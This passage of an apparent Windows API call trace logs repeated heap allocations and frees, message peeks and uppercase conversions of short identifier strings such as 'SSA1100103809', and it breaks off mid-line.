[0209.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0209.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0209.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0209.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0209.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0209.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0209.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0209.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0209.653] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0209.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0209.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0209.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0209.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0209.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0209.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0209.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c78 [0209.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0209.653] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0209.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0209.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0209.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0209.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0209.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0209.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0209.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0209.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0209.653] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0209.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0209.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0209.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0209.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0209.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0209.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0209.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d08 [0209.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0209.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0209.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0209.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0209.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0209.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0209.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0209.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0209.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0209.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0209.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0209.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bd8 [0209.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0209.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0209.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0209.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0209.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0209.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0209.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0209.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c18 [0209.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0209.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0209.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0209.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0209.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0209.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0209.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0209.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0209.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c28 [0209.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0209.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0209.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0209.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0209.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ce8 [0209.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0209.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0209.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c38 [0209.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0209.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0209.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0209.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0209.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0209.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0209.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0209.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0209.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c48 [0209.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0209.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0209.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0209.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0209.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c28 [0209.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0209.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0209.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0209.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0209.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0209.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0209.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0209.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0209.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0209.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0209.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0209.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0209.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0209.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0209.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0209.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0209.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0209.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0209.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0209.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c88 [0209.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0209.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0209.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0209.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0209.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0209.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0209.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0209.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0209.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0209.658] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0209.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0209.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0209.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa9a8 [0209.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0209.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0209.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0209.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0209.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0209.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0209.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0209.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0209.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0209.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0209.659] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0209.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0209.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0209.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0209.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0209.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0209.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0209.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0209.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0209.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0209.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0209.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0209.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0209.659] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0209.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0209.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0209.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf30 [0209.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a745e0 [0209.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0209.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0209.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0209.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0209.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0209.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0209.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0209.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0209.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0209.660] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0209.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0209.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0209.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0209.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0209.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0209.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0209.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0209.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0209.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0209.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0209.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0209.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0209.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0209.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0209.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0209.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0209.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0209.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0209.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0209.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0209.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0209.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a745e0 | out: hHeap=0x2af0000) returned 1 [0209.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0209.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0209.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0209.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0209.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0209.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0209.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0209.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0209.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0209.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0209.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0209.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0209.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0209.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0209.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0209.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0209.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0209.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0209.662] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0209.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0209.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0209.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab038 [0209.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74670 [0209.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0209.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0209.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0209.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0209.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0209.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0209.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0209.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0209.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0209.662] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0209.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0209.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0209.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0209.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0209.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0209.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0209.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0209.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0209.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0209.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0209.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0209.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0209.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0209.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0209.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0209.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0209.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0209.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0209.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0209.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0209.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0209.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0209.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0209.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74670 | out: hHeap=0x2af0000) returned 1 [0209.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0209.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0209.663] HeapFree (in: hHeap=0x2af0000, 